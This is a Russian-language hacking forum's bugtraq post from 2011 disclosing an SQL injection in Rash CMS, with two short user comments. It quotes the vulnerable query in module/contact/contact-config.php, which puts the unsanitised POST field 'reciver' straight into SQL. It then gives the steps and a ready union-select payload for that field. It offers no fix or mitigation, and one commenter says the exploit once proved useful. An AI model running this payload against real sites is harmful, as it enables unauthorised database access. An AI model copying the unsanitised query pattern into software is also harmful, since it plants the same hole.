Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе

Последнее на Форуме

Контакты

Связь с Администрацией

hpcteam1[@]gmail.com

Bugtraq rss

[ Добавить Материал ]

SQL-инъекция в Rash CMS


Bugtraq /

Программа: Rash CMS

Описание:

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL запросы к базе данных

Эксплоит:

Уязвимый файл:

http://127.0.0.1/module/contact/contact-config.php

Строка: 54

$q = $d->getrows("SELECT `u_id` FROM `permissions` WHERE
`access_admin_area`='1' AND `u_id`=$_POST[reciver]",true);


Переходим:

http://127.0.0.1/index.php?module=contact

Вы должны изменить POST запрос, в поле RECIVER, на свой SQL запрос к БД

reciver=-1+union+all+select+version()--



Автор: keracker

Материал добавил ShellAPI

Комментарии(2)

Дата: 2011-04-16 10:50:08

Добавить Комментарий к Материалу

Вы должны быть авторизованы на форуме чтобы добавлять комментарии. Регистрация Уже авторизованы?

Комментарии к Материалу

 adm1non              2011-05-08 15:27:59

Подмигивающий

 s0llo              2012-08-17 17:02:44

когда то этот эксплойт мне пригодился Улыбающийся

Последнее на Сайте

Новости

Статьи

Bugtraq

Файлы

Copyright © 2008 - 2017 «HPC». При копировании материалов ставьте ссылку на источник.
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.
Пользовательское соглашение Реклама на сайте